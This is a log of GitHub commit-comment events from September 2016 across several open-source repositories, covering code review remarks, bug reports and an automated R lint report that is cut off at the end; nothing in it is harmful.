{"id":"4542180549","type":"CommitCommentEvent","actor":{"login":"jcdyer"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18968982,"position":8,"line":27,"path":"lms/djangoapps/grades/tests/test_models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:19:01Z","updated_at":"2016-09-09T20:19:01Z","body":"They are deterministically ordered by `sort_keys=True`.  That's also required for our hashing to work.\r\n"}},"created_at":"2016-09-09T20:19:01Z"}
{"id":"4542181183","type":"CommitCommentEvent","actor":{"login":"Maryom"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18968986,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:19:10Z","updated_at":"2016-09-09T20:19:10Z","body":"Salaam,\r\n\r\nJust a small note. I noticed that this 👇🏼 line in the repo. still has NS although it's written without NS in the README! Maybe you need to edit it in the repo. also? I don't have permission to edit it in the repo.\r\n\r\n`Breeze through Date, DateComponents, and TimeInterval`\r\n\r\n"}},"created_at":"2016-09-09T20:19:10Z"}
{"id":"4542184511","type":"CommitCommentEvent","actor":{"login":"tomatosouplabs"},"repo":{"name":"Xilinx/u-boot-xlnx"},"payload":{"comment":{"id":18968991,"position":null,"line":null,"path":null,"commit_id":"2ac241653854cfd78e8688136aa9954f884192ee","created_at":"2016-09-09T20:19:52Z","updated_at":"2016-09-09T20:19:52Z","body":"This has caused me a problem with the bad block table which does use the OOB to store its identifying pattern (see bbt_pattern). The MTD NAND driver (nand_base.c, nand_bbt.c) scans the flash for a BBT (primary and mirror) generally on bootup when U-Boot tries to read the environment from flash. The MTD operation mode used is MTD_OPS_PLACE_OOB by U-Boot (and Linux). For the on-die ECC chip it calls the nand_chip->ecc.read_page function, which you changed from being able to read the OOB to not reading the OOB. Since it expected an OOB it is acting on whatever was in the chip's OOB memory buffer from a possible earlier transaction using raw mode (if any). End result one would normally see is each time U-Boot boots it can't find the BBT and re-scans the entire flash and creates and writes a new one. This adds time and wastes erase cycles.\r\n\r\nIf you look at the Linux driver, pl353_nand.c, it sets the ecc.read_page = pl353_nand_read_page_raw. This driver has no _nooob function.\r\n\r\nU-Boot and the BBT code seems happy now that I reversed this change and put it back to read_page_raw."}},"created_at":"2016-09-09T20:19:52Z"}
{"id":"4542184842","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18968992,"position":61,"line":117,"path":"scripts/album.js","commit_id":"89cf3ad7d5f209e8404bcbe1a10ad8ad10343d51","created_at":"2016-09-09T20:19:56Z","updated_at":"2016-09-09T20:19:56Z","body":"I can't test this because your albums.html is broken?\r\nhttps://bantuist.github.io/album.html"}},"created_at":"2016-09-09T20:19:56Z"}
{"id":"4542186589","type":"CommitCommentEvent","actor":{"login":"daniel-j-born"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":18968997,"position":4,"line":743,"path":"src/core/lib/iomgr/tcp_server_posix.c","commit_id":"9275d4067cfd9233edf2ae9a0fe1255c8c730f19","created_at":"2016-09-09T20:20:17Z","updated_at":"2016-09-09T20:20:17Z","body":"Why was this method added?\r\n\r\nThe problem with this method is that it ignores the refcount and ref/unref because it results in a call to finish_shutdown(): on_read()=>(deactivated_all_ports()||destroyed_port())=>finish_shutdown()=>gpr_free().\r\n\r\nA call to this method deletes the grpc_tcp_server regardless of the current refcount.\r\n"}},"created_at":"2016-09-09T20:20:17Z"}
{"id":"4542187081","type":"CommitCommentEvent","actor":{"login":"jcdyer"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18969001,"position":8,"line":27,"path":"lms/djangoapps/grades/tests/test_models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:20:23Z","updated_at":"2016-09-09T20:20:23Z","body":"...and tested on L127."}},"created_at":"2016-09-09T20:20:23Z"}
{"id":"4542190186","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18969013,"position":308,"line":3337,"path":"android/apollo/src/com/andrew/apollo/MusicPlaybackService.java","commit_id":"6416ff4aa5fcc7876b08986141fbe0732bf2f916","created_at":"2016-09-09T20:21:01Z","updated_at":"2016-09-09T20:21:01Z","body":"this cancels any previously sent shutdown intents so that we can send ours now."}},"created_at":"2016-09-09T20:21:01Z"}
{"id":"4542194807","type":"CommitCommentEvent","actor":{"login":"Mazyod"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18969022,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:21:56Z","updated_at":"2016-09-09T20:21:56Z","body":"which line? Can you find a link?"}},"created_at":"2016-09-09T20:21:56Z"}
{"id":"4542197754","type":"CommitCommentEvent","actor":{"login":"erikmd"},"repo":{"name":"erikmd/ssr-under-tac"},"payload":{"comment":{"id":18969028,"position":209,"line":130,"path":"src/under.v","commit_id":"29349aaf60a511b2b526f6a48b8bdda38b076247","created_at":"2016-09-09T20:22:32Z","updated_at":"2016-09-09T20:22:32Z","body":"Le vendredi 9 septembre 2016 à 07:34 -0700, Enrico a écrit :\n> @erikmd Erik, can you explain why top' and lhs' have to be unified by hand here? If I understand it correctly, rewrite [top]equ does it too.\n\nThe issue with doing \"rewrite [top]equ\" alone is that it would keep\nall evars (those that are specifically introduced by the under tactic)\nuninstantiated, so after using the tactic the user would end up with\nseveral shelved goals for these evars.\nI've seen in the ssr refman that not-instantiating existing evars is a\ndesign choice for ssreflect's rewrite (which is an important feature\nwhen doing a sequence of rewritings IIUC), but in my use case doing\n\"unify top' lhs' with typeclass_instances\" beforehand did the trick...\n"}},"created_at":"2016-09-09T20:22:32Z"}
{"id":"4542200732","type":"CommitCommentEvent","actor":{"login":"jcdyer"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18969038,"position":19,"line":38,"path":"lms/djangoapps/grades/tests/test_models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:23:11Z","updated_at":"2016-09-09T20:23:11Z","body":"Keep it simple.  Set up data.  Do things.  Make assertions."}},"created_at":"2016-09-09T20:23:11Z"}
{"id":"4542200795","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969039,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:23:12Z","updated_at":"2016-09-09T20:23:12Z","body":"@pgkirsch, good news bad news. The new master finds some unneeded substitutions, but I can't find a single version of master which can run this. Did you have a particular branch?"}},"created_at":"2016-09-09T20:23:12Z"}
{"id":"4542203868","type":"CommitCommentEvent","actor":{"login":"halt-hammerzeit"},"repo":{"name":"reactjs/redux"},"payload":{"comment":{"id":18969044,"position":null,"line":null,"path":null,"commit_id":"def86ae9af3b85259d167913b7eb81e677c5cb05","created_at":"2016-09-09T20:23:50Z","updated_at":"2016-09-09T20:23:50Z","body":"@gaearon Today I saw this trick:\r\n\r\n```js\r\nimport store from './store';\r\nimport actionCreators from './actions';\r\nimport { bindActionCreators } from 'redux';\r\nconst actions = bindActionCreators(actionCreators, store.dispatch);\r\nexport { actions };\r\nexport { store };\r\n```\r\n\r\nAnd then no need to bind action creators in `@connect()`.\r\n\r\nWhat do you think about this trick?\r\nCan you spot any downsides?"}},"created_at":"2016-09-09T20:23:50Z"}
{"id":"4542205796","type":"CommitCommentEvent","actor":{"login":"Maryom"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18969050,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:24:14Z","updated_at":"2016-09-09T20:24:14Z","body":"The first line:\r\n<img width=\"719\" alt=\"screen shot 2016-09-09 at 11 23 15 pm\" src=\"https://cloud.githubusercontent.com/assets/3218401/18401714/808934ec-76e4-11e6-804b-d4c170b6d885.png\">\r\n"}},"created_at":"2016-09-09T20:24:14Z"}
{"id":"4542206977","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969055,"position":null,"line":null,"path":null,"commit_id":"00463733cb26a702d45232a26c4eafc042ba3905","created_at":"2016-09-09T20:24:27Z","updated_at":"2016-09-09T20:24:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GtALFCZxShCkDXDCDyuLfQ"}},"created_at":"2016-09-09T20:24:27Z"}
{"id":"4542207370","type":"CommitCommentEvent","actor":{"login":"mayork"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969056,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:24:32Z","updated_at":"2016-09-09T20:24:32Z","body":"I have run sweeps of the aircraft model with master previously..."}},"created_at":"2016-09-09T20:24:32Z"}
{"id":"4542208025","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969057,"position":null,"line":null,"path":null,"commit_id":"00463733cb26a702d45232a26c4eafc042ba3905","created_at":"2016-09-09T20:24:40Z","updated_at":"2016-09-09T20:24:40Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#e9JHVlmtTFC_Z7mSLcXj_Q"}},"created_at":"2016-09-09T20:24:40Z"}
{"id":"4542208355","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969059,"position":null,"line":null,"path":null,"commit_id":"00463733cb26a702d45232a26c4eafc042ba3905","created_at":"2016-09-09T20:24:44Z","updated_at":"2016-09-09T20:24:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#csoKHq3WQ-S9E3cEd3TI2A"}},"created_at":"2016-09-09T20:24:44Z"}
{"id":"4542214413","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969072,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:26:00Z","updated_at":"2016-09-09T20:26:00Z","body":"Yeah I thought I remembered it working as well! I wasn't sure it was the script version of `aircraft.py` that I was running, or this version on the master branch of `gpkit-models`"}},"created_at":"2016-09-09T20:26:00Z"}
{"id":"4542216170","type":"CommitCommentEvent","actor":{"login":"Woersty"},"repo":{"name":"Woersty/LoxBerry-Plugin-miniserverbackup"},"payload":{"comment":{"id":18969079,"position":null,"line":null,"path":null,"commit_id":"5bf2516e7df3bd4e4a0070bac04673914fdfc625","created_at":"2016-09-09T20:26:22Z","updated_at":"2016-09-09T20:26:22Z","body":"Fixes #5 "}},"created_at":"2016-09-09T20:26:22Z"}
{"id":"4542216438","type":"CommitCommentEvent","actor":{"login":"ap"},"repo":{"name":"rperce/vim-css-color"},"payload":{"comment":{"id":18969080,"position":null,"line":null,"path":null,"commit_id":"d2c633536adfbb175607ac8c975c8c916d0677a0","created_at":"2016-09-09T20:26:25Z","updated_at":"2016-09-09T20:26:25Z","body":"Btw you can put this file in `~/.vim/after/syntax/` and then just use stock vim-css-color. That way you don’t need to maintain a fork of the plugin."}},"created_at":"2016-09-09T20:26:25Z"}
{"id":"4542217678","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969084,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:26:41Z","updated_at":"2016-09-09T20:26:41Z","body":"The version on `aircraft_improvements` runs great."}},"created_at":"2016-09-09T20:26:41Z"}
{"id":"4542219809","type":"CommitCommentEvent","actor":{"login":"optisudhir"},"repo":{"name":"optisudhir/PetPawProject"},"payload":{"comment":{"id":18969097,"position":null,"line":null,"path":null,"commit_id":"b166f618074bf85cbacacad1807a30cec11f9f10","created_at":"2016-09-09T20:27:09Z","updated_at":"2016-09-09T20:27:09Z","body":"Comment JLT!!"}},"created_at":"2016-09-09T20:27:09Z"}
{"id":"4542224371","type":"CommitCommentEvent","actor":{"login":"mahendratrue"},"repo":{"name":"mahendratrue/DataStructure"},"payload":{"comment":{"id":18969104,"position":null,"line":null,"path":null,"commit_id":"d0b144f2bd150a8898dac1447ae074c2239801e0","created_at":"2016-09-09T20:28:06Z","updated_at":"2016-09-09T20:28:06Z","body":"initial commit"}},"created_at":"2016-09-09T20:28:06Z"}
{"id":"4542226009","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969107,"position":null,"line":null,"path":null,"commit_id":"09305d3234fb9810a30e9dd17b983ae9d4f4861b","created_at":"2016-09-09T20:28:26Z","updated_at":"2016-09-09T20:28:26Z","body":"Dont worry too much about interaction tables yet. Right now, the tables we need are only for holding simple data so we might be able to do some simple stuff"}},"created_at":"2016-09-09T20:28:26Z"}
{"id":"4542228315","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969112,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:28:55Z","updated_at":"2016-09-09T20:28:55Z","body":"I still can't find any commit on master which can run this commit (302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5) as a script (`python aircraft.py`)"}},"created_at":"2016-09-09T20:28:55Z"}
{"id":"4542228382","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969113,"position":12,"line":12,"path":"sql/CreateClientTable.sql","commit_id":"e1b244f3b4e7dcbfed9f6c2dd0646d2f5ce818f7","created_at":"2016-09-09T20:28:56Z","updated_at":"2016-09-09T20:28:56Z","body":"Should probably just be `id`"}},"created_at":"2016-09-09T20:28:56Z"}
{"id":"4542229993","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969118,"position":13,"line":13,"path":"sql/CreateClientTable.sql","commit_id":"e1b244f3b4e7dcbfed9f6c2dd0646d2f5ce818f7","created_at":"2016-09-09T20:29:14Z","updated_at":"2016-09-09T20:29:14Z","body":"A name shouldnt be longer than 64 characters"}},"created_at":"2016-09-09T20:29:14Z"}
{"id":"4542230793","type":"CommitCommentEvent","actor":{"login":"mayork"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969122,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:29:23Z","updated_at":"2016-09-09T20:29:23Z","body":"huh weird I thought I ran it on master but maybe I didn't"}},"created_at":"2016-09-09T20:29:23Z"}
{"id":"4542233005","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969125,"position":15,"line":15,"path":"sql/CreateClientTable.sql","commit_id":"e1b244f3b4e7dcbfed9f6c2dd0646d2f5ce818f7","created_at":"2016-09-09T20:29:50Z","updated_at":"2016-09-09T20:29:50Z","body":"git url not longer than 1024"}},"created_at":"2016-09-09T20:29:50Z"}
{"id":"4542233793","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969127,"position":16,"line":16,"path":"sql/CreateClientTable.sql","commit_id":"e1b244f3b4e7dcbfed9f6c2dd0646d2f5ce818f7","created_at":"2016-09-09T20:30:00Z","updated_at":"2016-09-09T20:30:00Z","body":"git hash not longer than 1024"}},"created_at":"2016-09-09T20:30:00Z"}
{"id":"4542234761","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"cdiener/proliferation"},"payload":{"comment":{"id":18969128,"position":null,"line":null,"path":null,"commit_id":"65e2a6e3fcaf133fbca94c3244ecb79ba122ef82","created_at":"2016-09-09T20:30:14Z","updated_at":"2016-09-09T20:30:14Z","body":"[R/analysis.R:1:2:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L1) *style:* **Commented code should be removed.**\n```r\n​## Copyright 2016 Christian Diener <mail[at]cdiener.com>\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/analysis.R:29:31:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L29) *style:* **Commas should always have a space after.**\n```r\n​        in_t <- colMeans(v[ti,]) + 1e-6\n                              ^\n```\n[R/analysis.R:33:30:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​        res <- data.table(rid=names(in_t), panel=pname, lfc=lfcs)\n                            ~^~\n```\n[R/analysis.R:33:49:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​        res <- data.table(rid=names(in_t), panel=pname, lfc=lfcs)\n                                               ~^~\n```\n[R/analysis.R:33:60:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​        res <- data.table(rid=names(in_t), panel=pname, lfc=lfcs)\n                                                          ~^~\n```\n[R/analysis.R:60:28:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​    scores <- vector(length=n)\n                          ~^~\n```\n[R/analysis.R:61:41:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​    scores[pws == p] <- abs(w[pws == p])/nr\n                                       ~^~\n```\n[R/analysis.R:62:27:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    scores[pws != p] <- -1/(n - nh)\n                         ~^~\n```\n[R/analysis.R:62:28:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L62) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    scores[pws != p] <- -1/(n - nh)\n                           ^\n```\n[R/analysis.R:89:52:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L89) *style:* **Put spaces around all infix operators.**\n```r\n​    norm <- replicate(n, ES(p, w, sample(pws), both=TRUE))\n                                                  ~^~\n```\n[R/analysis.R:93:19:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L93) *style:* **Put spaces around all infix operators.**\n```r\n​        nes <- -es/mean(no)\n                 ~^~\n```\n[R/analysis.R:94:29:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​        pval <- sum(no < es)/length(no)\n                           ~^~\n```\n[R/analysis.R:97:18:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L97) *style:* **Put spaces around all infix operators.**\n```r\n​        nes <- es/mean(no)\n                ~^~\n```\n[R/analysis.R:98:29:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L98) *style:* **Put spaces around all infix operators.**\n```r\n​        pval <- sum(no > es)/length(no)\n                           ~^~\n```\n[R/analysis.R:118:36:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L118) *style:* **Commas should always have a space after.**\n```r\n​            xi <- paste0(substr(xi,1,n-1), \"...\")\n                                   ^\n```\n[R/analysis.R:118:38:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L118) *style:* **Commas should always have a space after.**\n```r\n​            xi <- paste0(substr(xi,1,n-1), \"...\")\n                                     ^\n```\n[R/analysis.R:118:39:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/analysis.R#L118) *style:* **Put spaces around all infix operators.**\n```r\n​            xi <- paste0(substr(xi,1,n-1), \"...\")\n                                     ~^~\n```\n[R/exarray.R:1:2:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/exarray.R#L1) *style:* **Commented code should be removed.**\n```r\n​## Copyright 2016 Christian Diener <mail[at]cdiener.com>\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/exarray.R:41:12:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/exarray.R#L41) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(ExpressionSet(res))\n           ^~~~~~~~~~~~~\n```\n[R/ml.R:1:2:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L1) *style:* **Commented code should be removed.**\n```r\n​## Copyright 2016 Christian Diener <mail[at]cdiener.com>\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ml.R:25:20:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​    mse <- mean(res^2)\n                  ~^~\n```\n[R/ml.R:28:25:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​    mre <- mean(abs(res)/abs(truth))\n                       ~^~\n```\n[R/ml.R:29:23:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​    rsq <- 1 - sum(res^2)/sum((truth - mean(truth))^2)\n                     ~^~\n```\n[R/ml.R:29:26:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​    rsq <- 1 - sum(res^2)/sum((truth - mean(truth))^2)\n                        ~^~\n```\n[R/ml.R:29:31:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    rsq <- 1 - sum(res^2)/sum((truth - mean(truth))^2)\n                              ^\n```\n[R/ml.R:29:52:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​    rsq <- 1 - sum(res^2)/sum((truth - mean(truth))^2)\n                                                  ~^~\n```\n[R/ml.R:31:10:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    c(mse=mse, rmse=rmse, mae=mae, mre=mre, rsq=rsq)\n        ~^~\n```\n[R/ml.R:31:20:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    c(mse=mse, rmse=rmse, mae=mae, mre=mre, rsq=rsq)\n                  ~^~\n```\n[R/ml.R:31:30:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    c(mse=mse, rmse=rmse, mae=mae, mre=mre, rsq=rsq)\n                            ~^~\n```\n[R/ml.R:31:39:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    c(mse=mse, rmse=rmse, mae=mae, mre=mre, rsq=rsq)\n                                     ~^~\n```\n[R/ml.R:31:48:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    c(mse=mse, rmse=rmse, mae=mae, mre=mre, rsq=rsq)\n                                              ~^~\n```\n[R/ml.R:50:8:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    for(i in 1:ncol(M)) {\n       ^\n```\n[R/ml.R:51:69:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​        newnames <- paste0(nam[i], \"x\", colnames(M[, i:ncol(M), drop=F]))\n                                                                   ~^~\n```\n[R/ml.R:52:20:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​        x <- M[, i]*M[, i:ncol(M), drop=F]\n                  ~^~\n```\n[R/ml.R:52:40:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/ml.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​        x <- M[, i]*M[, i:ncol(M), drop=F]\n                                      ~^~\n```\n[R/RcppExports.R:5:11:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/RcppExports.R#L5) *style:* **Only use double-quotes.**\n```r\n​    .Call('prtools_matrix_reduce', PACKAGE = 'prtools', m, idx, factors, method)\n          ^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/RcppExports.R:5:46:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/RcppExports.R#L5) *style:* **Only use double-quotes.**\n```r\n​    .Call('prtools_matrix_reduce', PACKAGE = 'prtools', m, idx, factors, method)\n                                             ^~~~~~~~~\n```\n[R/RcppExports.R:7:1:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/RcppExports.R#L7) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/zzz.R:1:2:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/R/zzz.R#L1) *style:* **Commented code should be removed.**\n```r\n​## Copyright 2016 Christian Diener <mail[at]cdiener.com>\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_analysis.R:4:24:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- matrix(1, nrow=10, ncol=10)\n                      ~^~\n```\n[tests/testthat/test_analysis.R:4:33:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- matrix(1, nrow=10, ncol=10)\n                               ~^~\n```\n[tests/testthat/test_analysis.R:7:25:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    map <- rep(1:2, each=5)\n                       ~^~\n```\n[tests/testthat/test_analysis.R:11:29:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​    extra <- data.frame(info=paste0(\"info\", 1:10))\n                           ~^~\n```\n[tests/testthat/test_analysis.R:21:48:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​    expect_equal(2, length(ES(\"a\", w, pws, both=TRUE)))\n                                              ~^~\n```\n[tests/testthat/test_analysis.R:37:36:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_analysis.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​    long <- paste(letters, collapse=\" \")\n                                  ~^~\n```\n[tests/testthat/test_exarray.R:4:21:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                    ^\n```\n[tests/testthat/test_exarray.R:4:23:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) 